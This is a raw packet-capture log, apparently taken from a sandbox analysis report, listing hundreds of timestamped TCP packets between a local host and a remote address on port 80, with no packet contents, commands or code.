                                                                                                                                                                Dec 13, 2024 01:37:36.060553074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.060574055 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.060595036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.060609102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.060630083 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.060643911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.060667038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.060679913 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.060702085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.060719967 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.060729980 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.060794115 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.060805082 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.060813904 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.060816050 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.060822010 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.060837984 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.060851097 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.060893059 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.060939074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.060952902 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.060976982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.060992956 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.060996056 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.061007023 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.061016083 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.061018944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061026096 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.061033964 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061033964 CET8049775185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:36.061053991 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061072111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061081886 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061105967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061129093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061144114 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061167002 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061182976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061203003 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061217070 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061240911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061259985 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061283112 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061299086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061321974 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061336994 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061424017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061424017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061444998 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061470032 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061496019 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061510086 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061562061 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061628103 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061642885 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061670065 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061686039 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061716080 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061743021 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061765909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061779022 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061808109 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061824083 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061851978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061866999 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061893940 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061913013 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061938047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061950922 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061978102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.061994076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062043905 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062081099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062105894 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062134027 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062150002 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062208891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062269926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062289000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062330008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062345028 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062361956 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062375069 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062398911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062419891 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062457085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062491894 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062515020 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062530994 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062557936 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062581062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062606096 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062638044 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062653065 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062678099 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062691927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062716961 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062731981 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062756062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062774897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062793016 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062822104 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062835932 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062863111 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062886000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062912941 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062933922 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062961102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.062973976 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063000917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063015938 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063040972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063071012 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063086033 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063129902 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063129902 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063150883 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063175917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063251972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063251972 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063281059 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063338041 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063354015 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063369036 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063396931 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063411951 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063431978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063451052 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063473940 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063488007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063515902 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063538074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063564062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063590050 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063606024 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063627958 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063689947 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063719988 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063734055 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063787937 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063815117 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063828945 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063847065 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063862085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063884020 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063903093 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063924074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063939095 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063961029 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063980103 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.063997984 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064013004 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064038992 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064065933 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064080000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064105988 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064119101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064145088 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064158916 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064179897 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064204931 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064219952 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064246893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064261913 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064285040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064300060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064321041 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064344883 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064359903 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064382076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064395905 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064419031 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064433098 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064457893 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064471960 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064495087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064508915 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064529896 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064543962 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064569950 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064584017 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064610004 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064625978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064650059 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064682007 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064706087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064721107 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064743996 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064763069 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064791918 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064851046 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064863920 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064887047 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.064955950 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065001011 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065193892 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065218925 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065232038 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065262079 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065287113 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065311909 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065325975 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065351963 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065365076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065397978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065428019 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065450907 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065512896 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065563917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065563917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065582037 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065608025 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065620899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065644979 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065701008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065701008 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065718889 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065727949 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065751076 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065783024 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065802097 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065828085 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065841913 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065861940 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065890074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065910101 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065969944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065969944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.065988064 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066015959 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066041946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066056967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066083908 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066114902 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066140890 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066167116 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066179991 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066205978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066224098 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066257000 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066273928 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066297054 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066323042 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066338062 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066365957 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066380978 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066407919 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066421986 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066453934 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066477060 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066504002 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066518068 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066546917 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066584110 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066612005 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066653967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066653967 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066670895 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066694021 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066723108 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066752911 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066772938 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066798925 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066824913 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066848040 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066914082 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066914082 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066950083 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.066994905 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067035913 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067054987 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067076921 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067091942 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067116022 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067141056 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067163944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067183971 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067203045 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067434072 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067470074 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067486048 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067509890 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067526102 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067549944 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067570925 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067586899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067606926 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067621946 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067642927 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067722082 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067737103 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067797899 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067814112 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067838907 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067866087 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067893982 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067909002 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067933083 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067948103 CET4977580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:36.067974091 CET4977580192.168.2.5185.81.68.147
